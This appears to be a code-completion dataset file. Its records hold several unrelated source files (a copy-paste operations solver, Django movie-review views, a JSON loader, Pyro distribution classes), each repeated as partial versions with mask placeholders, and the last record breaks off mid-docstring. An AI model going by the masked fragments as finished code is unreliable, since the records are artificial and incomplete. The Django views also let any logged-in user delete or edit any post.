"step-2": "<mask token>\n\n\ndef minOperations(n):\n \"\"\"\n a method that calculates the fewest number of operations needed\n to result in exactly n H characters in the file\n \"\"\"\n if n <= 1:\n return 0\n \"\"\"loop for n number of times\"\"\"\n for i in range(2, n + 1):\n if n % i == 0:\n return minOperations(int(n / i)) + i\n",
"step-3": "#!/usr/bin/python3\n\"\"\"minimum time time to write operations of copy and paste\"\"\"\n\n\ndef minOperations(n):\n \"\"\"\n a method that calculates the fewest number of operations needed\n to result in exactly n H characters in the file\n \"\"\"\n if n <= 1:\n return 0\n\n \"\"\"loop for n number of times\"\"\"\n for i in range(2, n + 1):\n if n % i == 0:\n return minOperations(int(n / i)) + i\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.core.paginator import Paginator
from .models import post
from django.contrib.auth.decorators import login_required
from .forms import post_fo
from django.db.models import Q
def index(request):
posts_list = post.objects.all().order_by('-date')
site = request.GET.get('site')
search_text = request.GET.get('search')
if search_text != None:
posts_list = posts_list.filter(Q(title__contains=search_text) | Q(contry__contains=search_text))
if site != 'None' and site != None:
posts_list = posts_list.filter(site=request.GET.get('site'))
if request.GET.get('rate') == 'true':
posts_list = posts_list.order_by('-rate')
paginator = Paginator(posts_list, 15)
page = request.GET.get('page')
posts = paginator.get_page(page)
ratelist = [1,2,3,4,5]
sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']
return render(request, 'index.html',{'posts':posts, 'site':site, 'sitelist':sitelist, 'ratelist':ratelist, 'search':search_text})
def detail(request, post_id):
po = get_object_or_404(post, pk = post_id)
ratelist = [1,2,3,4,5]
return render(request, 'detail.html', {'post':po, 'ratelist':ratelist})
@login_required(login_url = '/login/')
def delet(request, post_id):
po = get_object_or_404(post, pk = post_id)
po.delete()
return redirect(index)
@login_required(login_url = '/login/')
def new(request):
if request.method == 'POST':
form = post_fo(request.POST)
if form.is_valid():
post = form.save(commit = False)
post.date = timezone.now()
post.save()
return redirect(detail, post.id)
else:
form = post_fo()
return render(request, 'new.html', {'form':form})
@login_required(login_url = '/login/')
def update(request, post_id):
po = get_object_or_404(post, pk = post_id)
if request.method == 'POST':
po.site = request.POST.get("site")
po.contry = request.POST.get("contry")
po.genre = request.POST.get("genre")
po.rate = request.POST.get("rate")
po.title = request.POST.get("title")
po.review = request.POST.get("review")
po.date = timezone.now()
po.save()
return redirect(detail, po.id)
else:
return render(request, 'update.html', {'post_id':post_id, 'po':po})
|
normal
|
{
"blob_id": "2b88bec388f3872b63d6bfe200e973635bb75054",
"index": 5418,
"step-1": "<mask token>\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n@login_required(login_url='/login/')\ndef update(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n if request.method == 'POST':\n po.site = request.POST.get('site')\n po.contry = request.POST.get('contry')\n po.genre = request.POST.get('genre')\n po.rate = request.POST.get('rate')\n po.title = request.POST.get('title')\n po.review = request.POST.get('review')\n po.date = timezone.now()\n po.save()\n return redirect(detail, po.id)\n else:\n return render(request, 'update.html', {'post_id': post_id, 'po': po})\n",
"step-4": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator\nfrom .models import post\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import post_fo\nfrom django.db.models import Q\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n@login_required(login_url='/login/')\ndef update(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n if request.method == 'POST':\n po.site = request.POST.get('site')\n po.contry = request.POST.get('contry')\n po.genre = request.POST.get('genre')\n po.rate = request.POST.get('rate')\n po.title = request.POST.get('title')\n po.review = request.POST.get('review')\n po.date = timezone.now()\n po.save()\n return redirect(detail, po.id)\n else:\n return render(request, 'update.html', {'post_id': post_id, 'po': po})\n",
"step-5": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom django.core.paginator import Paginator\nfrom .models import post\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import post_fo\nfrom django.db.models import Q\n\ndef index(request):\n\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(contry__contains=search_text))\n \n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n \n\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n \n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n ratelist = [1,2,3,4,5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n\n return render(request, 'index.html',{'posts':posts, 'site':site, 'sitelist':sitelist, 'ratelist':ratelist, 'search':search_text})\n\n\n\ndef detail(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n ratelist = [1,2,3,4,5]\n\n return render(request, 'detail.html', {'post':po, 'ratelist':ratelist})\n\n@login_required(login_url = '/login/')\ndef delet(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n po.delete()\n\n return redirect(index)\n\n@login_required(login_url = '/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit = False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form':form})\n\n@login_required(login_url = '/login/')\ndef update(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n if request.method == 'POST':\n \n po.site = request.POST.get(\"site\")\n po.contry = request.POST.get(\"contry\")\n po.genre = request.POST.get(\"genre\")\n po.rate = request.POST.get(\"rate\")\n po.title = request.POST.get(\"title\")\n po.review = request.POST.get(\"review\")\n po.date = timezone.now()\n \n po.save()\n return redirect(detail, po.id)\n else: \n return render(request, 'update.html', {'post_id':post_id, 'po':po})\n\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import json
def get_json_data(page):
with open('geekshop/json_data.json', encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data[page]
def get_json_products_data(file_path):
with open(file_path, encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data
# print(get_json_products_data('geekshop/json_products_data.json'))
# print(get_json_data('products'))
|
normal
|
{
"blob_id": "08b53ba116b0c5875d39af4ce18296d547d5891d",
"index": 5692,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-3": "<mask token>\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-4": "import json\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-5": "import json\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n\n\n# print(get_json_products_data('geekshop/json_products_data.json'))\n# print(get_json_data('products'))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import absolute_import, division, print_function
import numbers
import torch
from torch.distributions import constraints
from pyro.distributions.distribution import Distribution
from pyro.distributions.score_parts import ScoreParts
from pyro.distributions.util import broadcast_shape, sum_rightmost
class TorchDistributionMixin(Distribution):
"""
Mixin to provide Pyro compatibility for PyTorch distributions.
You should instead use `TorchDistribution` for new distribution classes.
This is mainly useful for wrapping existing PyTorch distributions for
use in Pyro. Derived classes must first inherit from
:class:`torch.distributions.distribution.Distribution` and then inherit
from :class:`TorchDistributionMixin`.
"""
def __call__(self, sample_shape=torch.Size()):
"""
Samples a random value.
This is reparameterized whenever possible, calling
:meth:`~torch.distributions.distribution.Distribution.rsample` for
reparameterized distributions and
:meth:`~torch.distributions.distribution.Distribution.sample` for
non-reparameterized distributions.
:param sample_shape: the size of the iid batch to be drawn from the
distribution.
:type sample_shape: torch.Size
:return: A random value or batch of random values (if parameters are
batched). The shape of the result should be `self.shape()`.
:rtype: torch.Tensor
"""
return self.rsample(sample_shape) if self.has_rsample else self.sample(sample_shape)
@property
def event_dim(self):
"""
:return: Number of dimensions of individual events.
:rtype: int
"""
return len(self.event_shape)
def shape(self, sample_shape=torch.Size()):
"""
The tensor shape of samples from this distribution.
Samples are of shape::
d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape
:param sample_shape: the size of the iid batch to be drawn from the
distribution.
:type sample_shape: torch.Size
:return: Tensor shape of samples.
:rtype: torch.Size
"""
return sample_shape + self.batch_shape + self.event_shape
def expand(self, batch_shape):
"""
Expands a distribution to a desired
:attr:`~torch.distributions.distribution.Distribution.batch_shape`.
Note that this is more general than :meth:`expand_by` because
``d.expand_by(sample_shape)`` can be reduced to
``d.expand(sample_shape + d.batch_shape)``.
:param torch.Size batch_shape: The target ``batch_shape``. This must
compatible with ``self.batch_shape`` similar to the requirements
of :func:`torch.Tensor.expand`: the target ``batch_shape`` must
be at least as long as ``self.batch_shape``, and for each
non-singleton dim of ``self.batch_shape``, ``batch_shape`` must
either agree or be set to ``-1``.
:return: An expanded version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
batch_shape = list(batch_shape)
if len(batch_shape) < len(self.batch_shape):
raise ValueError("Expected len(batch_shape) >= len(self.batch_shape), "
"actual {} vs {}".format(len(batch_shape), len(self.batch_shape)))
# check sizes of existing dims
for dim in range(-1, -1 - len(self.batch_shape), -1):
if batch_shape[dim] == -1:
batch_shape[dim] = self.batch_shape[dim]
elif batch_shape[dim] != self.batch_shape[dim]:
if self.batch_shape[dim] != 1:
raise ValueError("Cannot broadcast dim {} of size {} to size {}".format(
dim, self.batch_shape[dim], batch_shape[dim]))
else:
raise NotImplementedError("https://github.com/uber/pyro/issues/1119")
sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]
return self.expand_by(sample_shape)
def expand_by(self, sample_shape):
"""
Expands a distribution by adding ``sample_shape`` to the left side of
its :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
To expand internal dims of ``self.batch_shape`` from 1 to something
larger, use :meth:`expand` instead.
:param torch.Size sample_shape: The size of the iid batch to be drawn
from the distribution.
:return: An expanded version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
return ReshapedDistribution(self, sample_shape=sample_shape)
def reshape(self, sample_shape=None, extra_event_dims=None):
raise Exception('''
.reshape(sample_shape=s, extra_event_dims=n) was renamed and split into
.expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).''')
def independent(self, reinterpreted_batch_ndims=None):
"""
Reinterprets the ``n`` rightmost dimensions of this distributions
:attr:`~torch.distributions.distribution.Distribution.batch_shape`
as event dims, adding them to the left side of
:attr:`~torch.distributions.distribution.Distribution.event_shape`.
Example::
>>> [d1.batch_shape, d1.event_shape]
[torch.Size((2, 3)), torch.Size((4, 5))]
>>> d2 = d1.independent(1)
>>> [d2.batch_shape, d2.event_shape]
[torch.Size((2,)), torch.Size((3, 4, 5))]
>>> d3 = d1.independent(2)
>>> [d3.batch_shape, d3.event_shape]
[torch.Size(()), torch.Size((2, 3, 4, 5))]
:param int reinterpreted_batch_ndims: The number of batch dimensions
to reinterpret as event dimensions.
:return: A reshaped version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
if reinterpreted_batch_ndims is None:
reinterpreted_batch_ndims = len(self.batch_shape)
# TODO return pyro.distributions.torch.Independent(self, reinterpreted_batch_ndims)
return ReshapedDistribution(self, reinterpreted_batch_ndims=reinterpreted_batch_ndims)
def mask(self, mask):
"""
Masks a distribution by a zero-one tensor that is broadcastable to the
distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
:param torch.Tensor mask: A zero-one valued float tensor.
:return: A masked copy of this distribution.
:rtype: :class:`MaskedDistribution`
"""
return MaskedDistribution(self, mask)
class TorchDistribution(torch.distributions.Distribution, TorchDistributionMixin):
"""
Base class for PyTorch-compatible distributions with Pyro support.
This should be the base class for almost all new Pyro distributions.
.. note::
Parameters and data should be of type :class:`~torch.Tensor`
and all methods return type :class:`~torch.Tensor` unless
otherwise noted.
**Tensor Shapes**:
TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::
x = d.sample(sample_shape)
assert x.shape == d.shape(sample_shape)
Pyro follows the same distribution shape semantics as PyTorch. It distinguishes
between three different roles for tensor shapes of samples:
- *sample shape* corresponds to the shape of the iid samples drawn from the distribution.
This is taken as an argument by the distribution's `sample` method.
- *batch shape* corresponds to non-identical (independent) parameterizations of
the distribution, inferred from the distribution's parameter shapes. This is
fixed for a distribution instance.
- *event shape* corresponds to the event dimensions of the distribution, which
is fixed for a distribution class. These are collapsed when we try to score
a sample from the distribution via `d.log_prob(x)`.
These shapes are related by the equation::
assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape
Distributions provide a vectorized
:meth`~torch.distributions.distribution.Distribution.log_prob` method that
evaluates the log probability density of each event in a batch
independently, returning a tensor of shape
``sample_shape + d.batch_shape``::
x = d.sample(sample_shape)
assert x.shape == d.shape(sample_shape)
log_p = d.log_prob(x)
assert log_p.shape == sample_shape + d.batch_shape
**Implementing New Distributions**:
Derived classes must implement the methods
:meth:`~torch.distributions.distribution.Distribution.sample`
(or :meth:`~torch.distributions.distribution.Distribution.rsample` if
``.has_rsample == True``) and
:meth:`~torch.distributions.distribution.Distribution.log_prob`, and must
implement the properties
:attr:`~torch.distributions.distribution.Distribution.batch_shape`,
and :attr:`~torch.distributions.distribution.Distribution.event_shape`.
Discrete classes may also implement the
:meth:`~torch.distributions.distribution.Distribution.enumerate_support`
method to improve gradient estimates and set
``.has_enumerate_support = True``.
"""
pass
class ReshapedDistribution(TorchDistribution):
"""
Reshapes a distribution by adding ``sample_shape`` to its total shape
and adding ``reinterpreted_batch_ndims`` to its
:attr:`~torch.distributions.distribution.Distribution.event_shape`.
:param torch.Size sample_shape: The size of the iid batch to be drawn from
the distribution.
:param int reinterpreted_batch_ndims: The number of extra event dimensions that will
be considered dependent.
"""
arg_constraints = {}
def __init__(self, base_dist, sample_shape=torch.Size(), reinterpreted_batch_ndims=0):
sample_shape = torch.Size(sample_shape)
if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape):
raise ValueError('Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), '
'actual {} vs {}'.format(reinterpreted_batch_ndims,
len(sample_shape + base_dist.batch_shape)))
self.base_dist = base_dist
self.sample_shape = sample_shape
self.reinterpreted_batch_ndims = reinterpreted_batch_ndims
shape = sample_shape + base_dist.batch_shape + base_dist.event_shape
batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.event_shape)
batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]
super(ReshapedDistribution, self).__init__(batch_shape, event_shape)
def expand_by(self, sample_shape):
base_dist = self.base_dist
sample_shape = torch.Size(sample_shape) + self.sample_shape
reinterpreted_batch_ndims = self.reinterpreted_batch_ndims
return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)
def independent(self, reinterpreted_batch_ndims=None):
if reinterpreted_batch_ndims is None:
reinterpreted_batch_ndims = len(self.batch_shape)
base_dist = self.base_dist
sample_shape = self.sample_shape
reinterpreted_batch_ndims = self.reinterpreted_batch_ndims + reinterpreted_batch_ndims
return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)
@property
def has_rsample(self):
return self.base_dist.has_rsample
@property
def has_enumerate_support(self):
return self.base_dist.has_enumerate_support
@constraints.dependent_property
def support(self):
return self.base_dist.support
def sample(self, sample_shape=torch.Size()):
return self.base_dist.sample(sample_shape + self.sample_shape)
def rsample(self, sample_shape=torch.Size()):
return self.base_dist.rsample(sample_shape + self.sample_shape)
def log_prob(self, value):
shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])
return sum_rightmost(self.base_dist.log_prob(value), self.reinterpreted_batch_ndims).expand(shape)
def score_parts(self, value):
shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])
log_prob, score_function, entropy_term = self.base_dist.score_parts(value)
log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims).expand(shape)
if not isinstance(score_function, numbers.Number):
score_function = sum_rightmost(score_function, self.reinterpreted_batch_ndims).expand(shape)
if not isinstance(entropy_term, numbers.Number):
entropy_term = sum_rightmost(entropy_term, self.reinterpreted_batch_ndims).expand(shape)
return ScoreParts(log_prob, score_function, entropy_term)
def enumerate_support(self):
if self.reinterpreted_batch_ndims:
raise NotImplementedError("Pyro does not enumerate over cartesian products")
samples = self.base_dist.enumerate_support()
if not self.sample_shape:
return samples
# Shift enumeration dim to correct location.
enum_shape, base_shape = samples.shape[:1], samples.shape[1:]
samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape) + base_shape)
samples = samples.expand(enum_shape + self.sample_shape + base_shape)
return samples
@property
def mean(self):
return self.base_dist.mean.expand(self.batch_shape + self.event_shape)
@property
def variance(self):
return self.base_dist.variance.expand(self.batch_shape + self.event_shape)
class MaskedDistribution(TorchDistribution):
"""
Masks a distribution by a zero-one tensor that is broadcastable to the
distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
:param torch.Tensor mask: A zero-one valued float tensor.
"""
arg_constraints = {}
def __init__(self, base_dist, mask):
if broadcast_shape(mask.shape, base_dist.batch_shape) != base_dist.batch_shape:
raise ValueError("Expected mask.shape to be broadcastable to base_dist.batch_shape, "
"actual {} vs {}".format(mask.shape, base_dist.batch_shape))
self.base_dist = base_dist
self._mask = mask
super(MaskedDistribution, self).__init__(base_dist.batch_shape, base_dist.event_shape)
@property
def has_rsample(self):
return self.base_dist.has_rsample
@property
def has_enumerate_support(self):
return self.base_dist.has_enumerate_support
@constraints.dependent_property
def support(self):
return self.base_dist.support
def sample(self, sample_shape=torch.Size()):
return self.base_dist.sample(sample_shape)
def rsample(self, sample_shape=torch.Size()):
return self.base_dist.rsample(sample_shape)
def log_prob(self, value):
return self.base_dist.log_prob(value) * self._mask
def score_parts(self, value):
return self.base_dist.score_parts(value) * self._mask
def enumerate_support(self):
return self.base_dist.enumerate_support()
@property
def mean(self):
return self.base_dist.mean
@property
def variance(self):
return self.base_dist.variance
|
normal
|
{
"blob_id": "0f0ea6f07f9a082042ed9aff7a95d372c32b5a13",
"index": 1897,
"step-1": "<mask token>\n\n\nclass ReshapedDistribution(TorchDistribution):\n <mask token>\n <mask token>\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n <mask token>\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + self.\n event_shape)\n\n\nclass MaskedDistribution(TorchDistribution):\n \"\"\"\n Masks a distribution by a zero-one tensor that is broadcastable to the\n distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.\n\n :param torch.Tensor mask: A zero-one valued float tensor.\n \"\"\"\n arg_constraints = {}\n\n def __init__(self, base_dist, mask):\n if broadcast_shape(mask.shape, base_dist.batch_shape\n ) != base_dist.batch_shape:\n raise ValueError(\n 'Expected mask.shape to be broadcastable to base_dist.batch_shape, actual {} vs {}'\n .format(mask.shape, base_dist.batch_shape))\n self.base_dist = base_dist\n self._mask = mask\n super(MaskedDistribution, self).__init__(base_dist.batch_shape,\n base_dist.event_shape)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape)\n\n def rsample(self, sample_shape=torch.Size()):\n return self.base_dist.rsample(sample_shape)\n\n def log_prob(self, value):\n return self.base_dist.log_prob(value) * self._mask\n\n def score_parts(self, value):\n return self.base_dist.score_parts(value) * self._mask\n\n def enumerate_support(self):\n return self.base_dist.enumerate_support()\n\n @property\n def mean(self):\n return self.base_dist.mean\n\n @property\n def variance(self):\n return self.base_dist.variance\n",
"step-2": "<mask token>\n\n\nclass TorchDistributionMixin(Distribution):\n <mask token>\n <mask token>\n <mask token>\n\n def shape(self, sample_shape=torch.Size()):\n \"\"\"\n The tensor shape of samples from this distribution.\n\n Samples are of shape::\n\n d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n :param sample_shape: the size of the iid batch to be drawn from the\n distribution.\n :type sample_shape: torch.Size\n :return: Tensor shape of samples.\n :rtype: torch.Size\n \"\"\"\n return sample_shape + self.batch_shape + self.event_shape\n <mask token>\n <mask token>\n\n def reshape(self, sample_shape=None, extra_event_dims=None):\n raise Exception(\n \"\"\"\n .reshape(sample_shape=s, extra_event_dims=n) was renamed and split into\n .expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).\"\"\"\n )\n <mask token>\n <mask token>\n\n\nclass TorchDistribution(torch.distributions.Distribution,\n TorchDistributionMixin):\n \"\"\"\n Base class for PyTorch-compatible distributions with Pyro support.\n\n This should be the base class for almost all new Pyro distributions.\n\n .. note::\n\n Parameters and data should be of type :class:`~torch.Tensor`\n and all methods return type :class:`~torch.Tensor` unless\n otherwise noted.\n\n **Tensor Shapes**:\n\n TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::\n\n x = d.sample(sample_shape)\n assert x.shape == d.shape(sample_shape)\n\n Pyro follows the same distribution shape semantics as PyTorch. It distinguishes\n between three different roles for tensor shapes of samples:\n\n - *sample shape* corresponds to the shape of the iid samples drawn from the distribution.\n This is taken as an argument by the distribution's `sample` method.\n - *batch shape* corresponds to non-identical (independent) parameterizations of\n the distribution, inferred from the distribution's parameter shapes. This is\n fixed for a distribution instance.\n - *event shape* corresponds to the event dimensions of the distribution, which\n is fixed for a distribution class. These are collapsed when we try to score\n a sample from the distribution via `d.log_prob(x)`.\n\n These shapes are related by the equation::\n\n assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape\n\n Distributions provide a vectorized\n 